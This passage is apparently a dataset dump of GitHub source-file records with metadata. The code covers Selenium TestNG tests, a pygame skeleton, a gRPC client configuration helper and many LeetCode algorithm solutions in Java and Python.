TestNG_5 {\r\n\tWebDriver driver;\r\n\t@BeforeClass\r\n\tpublic void beforeClass()\r\n\t{ \r\n\t\tdriver=new FirefoxDriver();\r\n\t\tdriver.get(\"https://www.training-support.net/selenium/target-practice\");\r\n\t\r\n\t}\r\n\t@Test(groups= {\"HeaderTests\",\"ButtonTests\"})\r\n\tpublic void title_class()\r\n\t\r\n\t{\r\n\t\tWebDriverWait wait=new WebDriverWait(driver,100);\r\n\t\twait.until(ExpectedConditions.visibilityOfAllElementsLocatedBy(By.xpath(\"//div[@class='ui sizer vertical segment']\")));\r\n\t\tString text1=driver.getTitle();\r\n\t\t\r\n\t\t\r\n\t\tSystem.out.println(\"Title of the page is \"+text1);\r\n\t}\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"HeaderTests\"})\r\n\tpublic void Header_test()\r\n\t{ \r\n\t\tString st=driver.findElement(By.id(\"third-header\")).getText();\r\n\t\tAssert.assertEquals(st, \"Third header\");\r\n\t\t\r\n\t}\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"HeaderTests\"})\r\n\tpublic void Header_test1()\r\n\t{\r\n\t\tWebElement bu=driver.findElement(By.id(\"third-header\"));\r\n\t\tSystem.out.println(bu.getCssValue(\"color\"));\r\n\t}\r\n\t\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"ButtonTests\"})\r\n\tpublic void Button_test1()\r\n\t{ \r\n\t\tString st1=driver.findElement(By.xpath(\"//button[text()='Olive']\")).getText();\r\n\t\tSystem.out.println(st1);\r\n\t\tAssert.assertEquals(st1, \"Olive\");\r\n\t}\r\n\t@Test(dependsOnMethods= {\"title_class\"},groups= {\"ButtonTests\"})\r\n\tpublic void Button_test2()\r\n\t{\r\n\t\tWebElement bu=driver.findElement(By.xpath(\"//button[text()='brown']\"));\r\n\t\tString bu1=bu.getCssValue(\"color\");\r\n\t\tSystem.out.println(bu1);\r\n\t\tAssert.assertEquals(bu1, \"rgb(255,255,255)\");\r\n\t\t\r\n\t}\r\n\t@AfterClass()\r\n\tpublic void aftermethod()\r\n {\r\n\t\tdriver.close();}\r\n\t\r\n\t}\r\n\r\n" }, { "alpha_fraction": 0.682539701461792, "alphanum_fraction": 0.6984127163887024, "avg_line_length": 10.600000381469727, "blob_id": "83d3eed83c0be7069413b8b0830c5d8529d4de5e", "content_id": "98e277c3d6ccfbcb73065b477b07176559b7108f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 63, "license_type": "no_license", "max_line_length": 28, "num_lines": 5, "path": "/Project_1.java", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "package Project_RestAssured;\r\n\r\npublic class Project_1 {\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6258503198623657, "alphanum_fraction": 0.7074829936027527, "avg_line_length": 19.285715103149414, "blob_id": "12bbbdf87dfa78ad6d51264d706393fddc20b14c", "content_id": "4050ace09a1eba8c6de4ae898b93c8d681c8bec4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/Listchecker.py", "repo_name": "surbbahl/sdet", "src_encoding": "UTF-8", "text": "numlist=[10,20,40,50,40]\r\nfirstelement=numlist[0]\r\nlastelement=numlist[-1]\r\nif firstelement==lastelement:\r\n print(True)\r\nelse:\r\n print(False)" } ]
35
Fascha/Python-Abschlussprojekt
https://github.com/Fascha/Python-Abschlussprojekt
2304619b35ddb5bd786416dc8aebccc387bd9e86
b5cfbc3a748ee03264044790ad1e268b804218e1
4b86bb99fafa51cf7563d5ba57119a8740e9c656
refs/heads/master
2016-08-12T23:27:35.135431
2015-12-17T12:13:58
2015-12-17T12:13:58
47,752,029
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6992481350898743, "alphanum_fraction": 0.7180451154708862, "avg_line_length": 17.581396102905273, "blob_id": "fe1132c7fc003921cf36e5d94dfa355d82d51c9a", "content_id": "99ae899cc724600616e0de45ba66a454f317118b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 798, "license_type": "no_license", "max_line_length": 92, "num_lines": 43, "path": "/game.py", "repo_name": "Fascha/Python-Abschlussprojekt", "src_encoding": "UTF-8", "text": "import sys\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\n\nwindow_width = 800\nwindow_height = 600\nwindow_size = window_width, window_height\n\ngameDisplay = pygame.display.set_mode(window_size)\n\ngame_clock = pygame.time.Clock()\nfps = 60\ngame_clock.tick(fps)\n\n\ngameOver = False\n\nbackgroundImage = pygame.image.load(\"data/images/background.jpg\")\nplayerImage = pygame.image.load(\"data/images/player.jpg\")\n\ndef gameLoop():\n\tglobal gameOver\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.KEYUP:\n\t\t\t\tif event.key == K_ESCAPE:\n\t\t\t\t\tpygame.quit()\n\t\t\t\t\tsys.exit(0)\n\n\t\t\t\t\n\n\t\tgameDisplay.blit(backgroundImage,(0,0))\n\t\tgameDisplay.blit(playerImage,(window_width/2 - playerImage.get_width()/2,window_height/8))\n\t\tpygame.display.flip()\n\n\n\n\ngameLoop()\npygame.quit()\nsys.exit(0)" }, { "alpha_fraction": 0.8505747318267822, "alphanum_fraction": 0.8505747318267822, "avg_line_length": 42, "blob_id": "908e94030a5a0b1c29b27a52514b784468cd6d8c", "content_id": "859dd1d6fdfe9b7229003bfe12c34469033a9976", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 87, "license_type": "no_license", "max_line_length": 59, "num_lines": 2, "path": "/README.md", "repo_name": "Fascha/Python-Abschlussprojekt", "src_encoding": "UTF-8", "text": "# Python-Abschlussprojekt\nAnalysieren und Visualisieren mit Python - Abschlussprojekt \n" } ]
2
bamasa/client
https://github.com/bamasa/client
d96e900762e89c7492816d1079cc9ed3f480e0db
2baad7984b3ea92a5712e35728bc24c179ed703f
82e7875f371740cb6e2150aca4ff6f21325ac315
refs/heads/master
2020-03-24T03:46:32.693144
2018-07-12T18:23:01
2018-07-12T18:23:01
142,432,591
0
0
null
2018-07-26T11:36:40
2018-07-12T18:23:12
2018-07-12T18:23:10
null
[ { "alpha_fraction": 0.6144164800643921, "alphanum_fraction": 0.6287185549736023, "avg_line_length": 28.627119064331055, "blob_id": "9212270b1d356c5b3d690d0b4f3a7e3e366da317", "content_id": "00ecf78a3f681e22c6e5359c556e7e42cab191cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1748, "license_type": "no_license", "max_line_length": 108, "num_lines": 59, "path": "/wonderlandClient/util.py", "repo_name": "bamasa/client", "src_encoding": "UTF-8", "text": "import os\n\nimport grpc\nimport yaml\n\nfrom .wonderland_pb2_grpc import wonderlandStub\n\n\ndef new_client():\n default_path = os.path.join(os.environ.get(\"HOME\"), \".wonder/config.yml\")\n return new_client_from_path(default_path)\n\n\ndef new_client_from_path(config_path):\n config = load_config(config_path)\n creds = load_credentials(config)\n channel = grpc.secure_channel(\n config.get(\"connect_to\"),\n creds,\n options=(\n ('grpc.max_send_message_length', 1024 * 1024 * 1024),\n ('grpc.max_receive_message_length', 1024 * 1024 * 1024),\n )\n )\n return wonderlandStub(channel)\n\n\ndef load_config(config_path):\n if not os.path.exists(config_path):\n raise Exception(\"Config file `{}` does not exist\".format(config_path))\n\n with open(config_path) as config_f:\n return yaml.load(config_f)\n\n\ndef load_credentials(config):\n path_ok = [\n os.path.exists(config.get(\"ca_cert\")),\n os.path.exists(config.get(\"client_key\")),\n os.path.exists(config.get(\"client_cert\")),\n ]\n if not all(path_ok):\n raise ValueError(\"One of credentials files does not exist\")\n\n root_cert = open(config.get(\"ca_cert\"), 'rb').read()\n private_key = open(config.get(\"client_key\"), 'rb').read()\n cert_chain = open(config.get(\"client_cert\"), 'rb').read()\n credentials = grpc.ssl_channel_credentials(\n root_certificates=root_cert,\n private_key=private_key,\n certificate_chain=cert_chain\n )\n\n return credentials\n\n\ndef check_jobs_equal(a, b):\n return (a.project == b.project) and (a.id == b.id) and (a.status == b.status) and (\n a.metadata == b.metadata) and (a.kind == b.kind) and (a.output == b.output) and (a.input == b.input)\n" }, { "alpha_fraction": 0.6657142639160156, "alphanum_fraction": 0.677142858505249, "avg_line_length": 14.909090995788574, "blob_id": "decd7c0b570ad0762b14638214e8383ddb6fe7d4", "content_id": "fad6630af16273dceb2ff45080eddd61cf86a118", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 350, "license_type": "no_license", "max_line_length": 36, "num_lines": 22, "path": "/wonderlandClient/__init__.py", "repo_name": "bamasa/client", "src_encoding": "UTF-8", "text": "from .wonderland_pb2 import (\n Job,\n ListOfJobs,\n RequestWithId,\n ListJobsRequest\n)\n\nfrom .wonderland_pb2_grpc import (\n wonderlandServicer,\n wonderlandStub,\n add_wonderlandServicer_to_server\n)\n\nfrom .util import (\n new_client,\n new_client_from_path,\n check_jobs_equal\n)\n\nfrom .worker import Worker\n\n__version__ = \"0.1\"\n" } ]
2
hannatao/LeetCode
https://github.com/hannatao/LeetCode
01996f84a291bd98acfb9e1e6e4c2b27da678cca
6731bfa5bd11b37d0fc032b1dbdf2f0752fb61bf
70d45e1a6bbda5084e29d343503b74372016e637
refs/heads/master
2018-10-28T08:15:49.917293
2018-09-17T15:44:58
2018-09-17T15:44:58
103,135,100
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.48750001192092896, "alphanum_fraction": 0.5041666626930237, "avg_line_length": 31.772727966308594, "blob_id": "a689484727dbe367d4466eff0c888792cc102bcd", "content_id": "ccba563915a7df949ffc61482a7bfbf6b2b46d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 720, "license_type": "no_license", "max_line_length": 78, "num_lines": 22, "path": "/Intersection_of_Two_Linked_Lists.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public class Solution {\n public ListNode getIntersectionNode(ListNode headA, ListNode headB) {\n if(headA == null || headB == null) {return null;}\n Stack<ListNode> q1 = new Stack<ListNode>();\n Stack<ListNode> q2 = new Stack<ListNode>();\n while(headA != null) {\n q1.add(headA);\n headA = headA.next;\n }\n while(headB != null) {\n q2.add(headB);\n headB = headB.next;\n }\n if(!q1.peek().equals(q2.peek())) {return null;}\n ListNode result = null;\n while(!q1.isEmpty() && !q2.isEmpty() && q1.peek().equals(q2.peek())) {\n result = q1.pop();\n q2.pop();\n }\n return result;\n }\n}" }, { "alpha_fraction": 0.46232178807258606, "alphanum_fraction": 0.4725050926208496, "avg_line_length": 31.799999237060547, "blob_id": "565bc3bfcf961367d3bf6d3720a317b2765343f1", "content_id": "0a3d95a721ac932c2cd454b992b2eb0677fbd0b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 491, "license_type": "no_license", "max_line_length": 64, "num_lines": 15, "path": "/Combinations.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<List<Integer>> combine(int n, int k) {\n if(k == n || k == 0){\n List<Integer> row = new ArrayList<Integer>();\n for(int i = 1; i <= k; i ++){\n row.add(i);\n }\n return new ArrayList<>(Arrays.asList(row));\n }\n List<List<Integer>> result = this.combine(n - 1, k - 1);\n result.forEach(e -> e.add(n));\n result.addAll(this.combine(n - 1, k));\n return result;\n }\n}" }, { "alpha_fraction": 0.5253505706787109, "alphanum_fraction": 0.5264293551445007, "avg_line_length": 31, "blob_id": "5cf349c61232980c40b60242c8db23df4e025805", "content_id": "eb59b7218c79ecb2e1a4c92705662d780cd7b330", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 927, "license_type": "no_license", "max_line_length": 69, "num_lines": 29, "path": "/Binary_Tree_Level_Order_Traversal.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\nclass Solution {\n public List<List<Integer>> levelOrder(TreeNode root) {\n List<List<Integer>> results = new ArrayList<List<Integer>>();\n Queue<TreeNode> queue = new LinkedList<TreeNode>();\n if(root == null){return results;}\n queue.offer(root);\n while(!queue.isEmpty()){\n int qsize = queue.size();\n List<Integer> result = new ArrayList<Integer>();\n for(int i = 0; i < qsize; i ++){\n TreeNode temp = queue.poll();\n if(temp.left != null){queue.offer(temp.left);}\n if(temp.right != null){queue.offer(temp.right);}\n result.add(temp.val);\n }\n results.add(result);\n }\n return results;\n }\n}" }, { "alpha_fraction": 0.3309859037399292, "alphanum_fraction": 0.34859153628349304, "avg_line_length": 24.266666412353516, "blob_id": "15e0a6c19cc0f44964c3fd3356e2b5f0ae8d3acf", "content_id": "4686134c4c5225c30818562d97a54e5bb303a812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1136, "license_type": "no_license", "max_line_length": 51, "num_lines": 45, "path": "/Product_of_Array_Except_Self.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public int[] productExceptSelf(int[] nums) {\n int total = 1;\n int count = 0;\n for(int num : nums){\n if(num != 0){total = total * num;}\n else{\n count ++;\n if(count == 2){break;}\n }\n }\n if(count == 0){\n for(int i = 0 ; i < nums.length; i ++){\n nums[i] = total / nums[i];\n }\n }else if(count == 1){\n for(int i = 0 ; i < nums.length; i ++){\n if(nums[i] != 0){\n nums[i] = 0;\n }else{\n nums[i] = total;\n }\n }\n }else{\n for(int i = 0 ; i < nums.length; i ++){\n nums[i] = 0;\n }\n }\n return nums;\n }\n\n//Nubility\npublic int[] productExceptSelf(int[] nums) {\n int n = nums.length;\n int[] res = new int[n];\n res[0] = 1;\n for (int i = 1; i < n; i++) {\n res[i] = res[i - 1] * nums[i - 1];\n }\n int right = 1;\n for (int i = n - 1; i >= 0; i--) {\n res[i] *= right;\n right *= nums[i];\n }\n return res;\n}" }, { "alpha_fraction": 0.5649913549423218, "alphanum_fraction": 0.5649913549423218, "avg_line_length": 23.08333396911621, "blob_id": "69e017756b0537ccf47c66cbdeaef166cda8559c", "content_id": "6ba0da94b0675cf7d6714c160602fb525a032f0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 577, "license_type": "no_license", "max_line_length": 58, "num_lines": 24, "path": "/Flatten_Binary_Tree_to_Linked_List.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "/**\n * Definition for a binary tree node.\n * public class TreeNode {\n * int val;\n * TreeNode left;\n * TreeNode right;\n * TreeNode(int x) { val = x; }\n * }\n */\nclass Solution {\n public void flatten(TreeNode root) {\n dfs(root, null);\n }\n \n public TreeNode dfs(TreeNode root, TreeNode previous){\n if(root == null){return previous;}\n previous = dfs(root.right, previous);\n previous = dfs(root.left, previous);\n root.right = previous;;\n root.left = null;\n previous = root;\n return previous;\n }\n}" }, { "alpha_fraction": 0.37152209877967834, "alphanum_fraction": 0.3764320909976959, "avg_line_length": 25.60869598388672, "blob_id": "f9a8f347abdf4d46328b6803a3cecadb9bd3ca6d", "content_id": "f4bfaddb9dcbcd33f1c1b284bbfbe7c06f725a57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 611, "license_type": "no_license", "max_line_length": 55, "num_lines": 23, "path": "/Is_Subsequence.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean isSubsequence(String s, String t) {\n char[] sub = s.toCharArray();\n char[] title = t.toCharArray();\n int index = 0;\n boolean flag = false;\n \n for(int i = 0;i < sub.length; i ++){\n flag = false;\n for(int j = index; j < title.length; j ++){\n if(title[j] == sub[i]){\n flag = true;\n index = j + 1;\n break;\n }\n }\n if(!flag){\n return false;\n }\n }\n return true;\n }\n}" }, { "alpha_fraction": 0.46341463923454285, "alphanum_fraction": 0.47256097197532654, "avg_line_length": 26.41666603088379, "blob_id": "6b4541a79c651bd45a1d060160ff03b2bb245424", "content_id": "d74a7ef0d9a8cc50d5bf8534db481114ebffd79f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 328, "license_type": "no_license", "max_line_length": 49, "num_lines": 12, "path": "/Maximum_Subarray.py", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution(object):\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n sum_i = nums[0]\n result = nums[0]\n for i in range(1,len(nums)):\n sum_i = max(nums[i], sum_i + nums[i])\n result = max(result, sum_i)\n return result" }, { "alpha_fraction": 0.29490020871162415, "alphanum_fraction": 0.35254988074302673, "avg_line_length": 25.58823585510254, "blob_id": "19fcc7664b9eef6fe52951ba55778e9337f100db", "content_id": "2bb8745f75dfd93ccf0f6270dab7d7b27b318e1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 451, "license_type": "no_license", "max_line_length": 63, "num_lines": 17, "path": "/Merge_Sorted_Array.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public void merge(int[] nums1, int m, int[] nums2, int n) {\n int l1 = m - 1;\n int l2 = n - 1;\n int len = m + n - 1;\n while(l1 >= 0 && l2 >= 0){\n if(nums2[l2] > nums1[l1]){\n nums1[len --] = nums2[l2 --];\n }else{\n nums1[len --] = nums1[l1 --];\n }\n }\n while(l2 >= 0){\n nums1[len --] = nums2[l2 --];\n } \n }\n}" }, { "alpha_fraction": 0.5867158770561218, "alphanum_fraction": 0.5904058814048767, "avg_line_length": 17.133333206176758, "blob_id": "cc7b66a527feabf19d9e57e72828f900c6783ba5", "content_id": "7422aaa4557c823471bfd90f2b3570b4ad0e6296", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 271, "license_type": "no_license", "max_line_length": 44, "num_lines": 15, "path": "/Convert_BST_to_Greater_Tree.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n int plus = 0;\n\tpublic TreeNode convertBST(TreeNode root) {\n dfs(root);\n return root;\n }\n\t\n\tpublic void dfs(TreeNode node) {\n\t\tif(node == null) {return;}\n\t\tdfs(node.right);\n\t\tnode.val += plus;\n\t\tplus = node.val;\n\t\tdfs(node.left);\n\t}\n}" }, { "alpha_fraction": 0.5087209343910217, "alphanum_fraction": 0.5101743936538696, "avg_line_length": 31.809524536132812, "blob_id": "11115064a6263bcd4ca24c14d832a20198ec8d31", "content_id": "e1b857dae12a8999e43bd19ce6577cafa7b34f30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 688, "license_type": "no_license", "max_line_length": 70, "num_lines": 21, "path": "/Word_Pattern.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean wordPattern(String pattern, String str) {\n String[] strs = str.split(\" \");\n if(strs.length != pattern.length()){return false;}\n Map<Character, String> map = new HashMap<Character, String>();\n Set<String> set = new HashSet<String>();\n for(int i = 0; i < pattern.length(); i ++) {\n \tchar key = pattern.charAt(i);\n \tif(map.containsKey(key)) {\n \t\tif(!map.get(key).equals(strs[i])) {\n \t\t\treturn false;\n \t\t}\n \t} else {\n \t\tif(set.contains(strs[i])) {return false;}\n \t\tmap.put(key, strs[i]);\n \t\tset.add(strs[i]);\n \t}\n }\n return true;\n }\n}" }, { "alpha_fraction": 0.35528597235679626, "alphanum_fraction": 0.37088388204574585, "avg_line_length": 27.875, "blob_id": "8be88d04e6ab2e7503de853a725cb7841faeef53", "content_id": "dbd5e2fa1cbed4737dd76d530c14432171222614", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1154, "license_type": "no_license", "max_line_length": 71, "num_lines": 40, "path": "/Find_K_Closest_Elements.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public List<Integer> findClosestElements(int[] arr, int k, int x) {\n List<Integer> list = new LinkedList<Integer>();\n int left = 0;\n int right = 0;\n int i = 0;\n if(arr.length == 1){\n list.add(arr[0]);\n return list;\n }\n for(i = 0; i < arr.length; i++){\n if(x <= arr[i]){\n left = i - 1;\n right = i;\n break;\n }\n }\n if(i == arr.length){\n left = i - 2;\n right = i - 1;\n }else if(i == 0){\n left = i;\n right = i + 1;\n }\n for(i = 0; i < arr.length; i++){\n if(Math.abs(arr[left] - x) <= Math.abs(arr[right] - x)){\n list.add(arr[left]);\n if(left - 1 >= 0){left --;}\n else{left = arr.length - 1;}\n }else{\n list.add(arr[right]);\n if(right + 1 <= arr.length - 1){right ++;}\n else{right = 0;}\n }\n if(list.size() == k){break;}\n }\n Collections.sort(list);\n return list;\n }\n}" }, { "alpha_fraction": 0.4047619104385376, "alphanum_fraction": 0.41228070855140686, "avg_line_length": 27.535715103149414, "blob_id": "9ae65e12633e9215d8bd055e140b8c85b7c6cee4", "content_id": "0911636595594a12d2452a19ac66ad98d1a41bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 798, "license_type": "no_license", "max_line_length": 80, "num_lines": 28, "path": "/Jump_Game.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean canJump(int[] nums) { \n if(nums.length == 1){return true;}\n if(nums[0] == 0){return false;} \n for(int i = 0; i < nums.length;){ \n if(i + nums[i] >= nums.length - 1){return true;}\n int next = findMax(nums, i, i + nums[i]);\n if(nums[next] == 0){\n return false;\n } \n i = next; \n }\n return true;\n }\n \n public int findMax(int[] nums, int start, int end){\n int pos = end;\n int max = nums[end];\n for(int z = end; z > start; z --){ //right to left, as far as possible\n if(z + nums[z] > max + pos){\n max = nums[z];\n pos = z;\n }\n }\n return pos;\n }\n \n}" }, { "alpha_fraction": 0.4961240291595459, "alphanum_fraction": 0.5085271596908569, "avg_line_length": 34.88888931274414, "blob_id": "ff4ebd03a66f36c0d27417f808e3ce1b640635ff", "content_id": "7afb839392dc2b58d85cadc06ac70db658bcced4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 645, "license_type": "no_license", "max_line_length": 89, "num_lines": 18, "path": "/Maximum_Product_Subarray.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public int maxProduct(int[] nums) {\n if(nums == null || nums.length == 0) {return 0;}\n int max = nums[0];\n int preMax = nums[0];\n int preMin = nums[0];\n int currentMax = nums[0];\n int currentMin = nums[0];\n for(int i = 1; i < nums.length; i ++) {\n currentMax = Math.max(nums[i], Math.max(nums[i] * preMax, nums[i] * preMin));\n currentMin = Math.min(nums[i], Math.min(nums[i] * preMax, nums[i] * preMin));\n max = Math.max(max, currentMax);\n preMax = currentMax;\n preMin = currentMin;\n }\n return max;\n }\n}" }, { "alpha_fraction": 0.5359001159667969, "alphanum_fraction": 0.5359001159667969, "avg_line_length": 29.0625, "blob_id": "86f21a090a556fa0cdb5d939a563b2e6899ad5e0", "content_id": "7de590358237623e99099c332437badf80f11689", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 961, "license_type": "no_license", "max_line_length": 79, "num_lines": 32, "path": "/Validate_Binary_Search_Tree.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public boolean isValidBST(TreeNode root) {\n if(root == null) {return true;}\n if(root.left != null) {\n \tTreeNode temp = root.left;\n \twhile(temp != null) {\n \t\tif(temp.val >= root.val) {return false;}\n \t\ttemp = temp.right;\n \t}\n }\n if(root.right != null) {\n \tTreeNode temp = root.right;\n \twhile(temp != null) {\n \t\tif(temp.val <= root.val) {return false;}\n \t\ttemp = temp.left;\n \t}\n }\n return isValidBST(root.left) && isValidBST(root.right);\n }\n}\n\nclass Solution {\n public boolean isValidBST(TreeNode root) {\n return dfs(root, Long.MIN_VALUE, Long.MAX_VALUE);\n }\n \n public boolean dfs(TreeNode root, long min, long max) {\n if(root == null) {return true;}\n if(root.val <= min || root.val >= max) {return false;}\n return dfs(root.left, min, root.val) && dfs(root.right, root.val, max);\n }\n}" }, { "alpha_fraction": 0.46298032999038696, "alphanum_fraction": 0.47797563672065735, "avg_line_length": 27.105262756347656, "blob_id": "f218b8fe1232147f094467a0f8208a86b6041122", "content_id": "00ace3f53e2c1226071cf14970a084588a196bfa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1067, "license_type": "no_license", "max_line_length": 93, "num_lines": 38, "path": "/Decode_String.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n public String decodeString(String s) {\n if(s == null || s.length() == 0) {return s;}\n Stack<String> stack = new Stack<String>();\n int num = 0;\n char[] chars = s.toCharArray();\n for(char c : chars) {\n \tif(c >= '0' && c <= '9') {\n \t\tnum *= 10;\n \t\tnum += (c - '0');\n \t} else if(c == '[') {\n \t\tstack.push(String.valueOf(num));\n \t\tnum = 0;\n \t} else if(c == ']') {\n \t\tprocess(stack);\n \t} else {\n \t\tstack.push(String.valueOf(c));\n \t}\n }\n if(stack.size() > 1) {process(stack);}\n return stack.pop();\n }\n\t\n\tpublic void process(Stack<String> stack) {\n\t\tStringBuilder s = new StringBuilder();\n\t\twhile(!stack.isEmpty() && (stack.peek().charAt(0) < '0' || stack.peek().charAt(0) > '9')) {\n\t\t\ts.insert(0, stack.pop());\n\t\t}\n\t\tif(!stack.isEmpty()) {\n\t\t\tString str = s.toString();\n\t\t\tint times = Integer.parseInt(stack.pop());\n\t\t\tfor(int i = 0; i < times - 1; i ++) {\n\t\t\t\ts.append(str);\n\t\t\t}\n\t\t}\n\t\tstack.push(s.toString());\n\t}\n}" }, { "alpha_fraction": 0.5279642343521118, "alphanum_fraction": 0.536912739276886, "avg_line_length": 16.920000076293945, "blob_id": "4c983238c542ed739ce1d76aae06d8028b366629", "content_id": "301491ab8086b5a01d1a28cc8177a76b3eacd933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 447, "license_type": "no_license", "max_line_length": 64, "num_lines": 25, "path": "/Target_Sum.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "class Solution {\n int sum = 0;\n\tpublic int findTargetSumWays(int[] nums, int S) {\n\t\tdfs(nums, 0, S, true);\n\t\tdfs(nums, 0, S, false);\n\t\treturn sum;\n }\n\t\n\tpublic void dfs(int[] nums, int index, int S, boolean symbol) {\n\t\tif(symbol) {\n\t\t\tS -= nums[index];\n\t\t} else {\n\t\t\tS += nums[index];\n\t\t}\n\t\tindex ++;\n\t\tif(index == nums.length) {\n\t\t\tif(S == 0) {\n\t\t\t\tsum ++;\n\t\t\t}\n\t\t\treturn;\n\t\t}\n\t\tdfs(nums, index, S, true);\n\t\tdfs(nums, index, S, false);\n\t}\n}" }, { "alpha_fraction": 0.4890895485877991, "alphanum_fraction": 0.4913468658924103, "avg_line_length": 32.25, "blob_id": "33dab51e23ce92998c07695627941b93000b9185", "content_id": "8ccaeef7551b97b31d73fe6965b15eea0c66f807", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1329, "license_type": "no_license", "max_line_length": 100, "num_lines": 40, "path": "/Byte_Dance_Five.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "import java.util.*;\n\npublic class Main{\n\n public static void main(String[] args) {\n Scanner scanner = new Scanner(System.in);\n int n = scanner.nextInt();\n int m = scanner.nextInt();\n int result = 0;\n Map<Integer, Set<Integer>> map = new HashMap<>();\n for(int i = 0; i < m; i ++) {\n int x = scanner.nextInt();\n int y = scanner.nextInt();\n Set<Integer> set = map.getOrDefault(y, new HashSet<>());\n set.add(x);\n map.put(y, set);\n }\n for(Map.Entry<Integer, Set<Integer>> entry : map.entrySet()) {\n Set<Integer> new_set = new HashSet<>();\n new_set.add(entry.getKey());\n dfs(entry.getValue(), new_set, map);\n map.put(entry.getKey(), new_set);\n }\n for(int i = 1; i <= n; i ++) {\n if(map.containsKey(i) && map.get(i).size() == n) { result ++; }\n }\n System.out.println(result);\n scanner.close();\n }\n\n public static void dfs(Set<Integer> set, Set<Integer> new_set, Map<Integer, Set<Integer>> map) {\n for(int num : set) {\n if(new_set.contains(num)) { continue; }\n new_set.add(num);\n if(map.containsKey(num)) {\n dfs(map.get(num), new_set, map);\n }\n }\n }\n}" }, { "alpha_fraction": 0.5677083134651184, "alphanum_fraction": 0.5729166865348816, "avg_line_length": 27.481481552124023, "blob_id": "2dde0742d9a4190633906f153db98754f48df385", "content_id": "d444b34f5398fb25f09d1346517713e8a44aa9c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 768, "license_type": "no_license", "max_line_length": 83, "num_lines": 27, "path": "/Palindrome_Partitioning.java", "repo_name": "hannatao/LeetCode", "src_encoding": "UTF-8", "text": "public List<List<String>> partition(String s) {\n List<List<String>> result = new ArrayList<List<String>>();\n List<String> list = new ArrayList<String>();\n dfs(s, 0, result, list);\n return result;\n }\n\t\n\tpublic void dfs(String s, int pos, List<List<String>> result, List<String> list) {\n\t\tif(pos == s.length()) {\n\t\t\tresult.add(new ArrayList<String>(list));\n\t\t} else {\n\t\t\tfor(int i = pos; i < s.length(); i ++) {\n\t\t\t\tif(isPalindrome(s, pos, i)) {\n\t\t\t\t\tlist.add(s.substring(pos, i + 1));\n\t\t\t\t\tdfs(s, i + 1, result, list);\n\t\t\t\t\tlist.remove(list.size() - 1);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\t\n\tpublic boolean isPalindrome(String s, int low, int high) {\n\t\twhile(low < high) 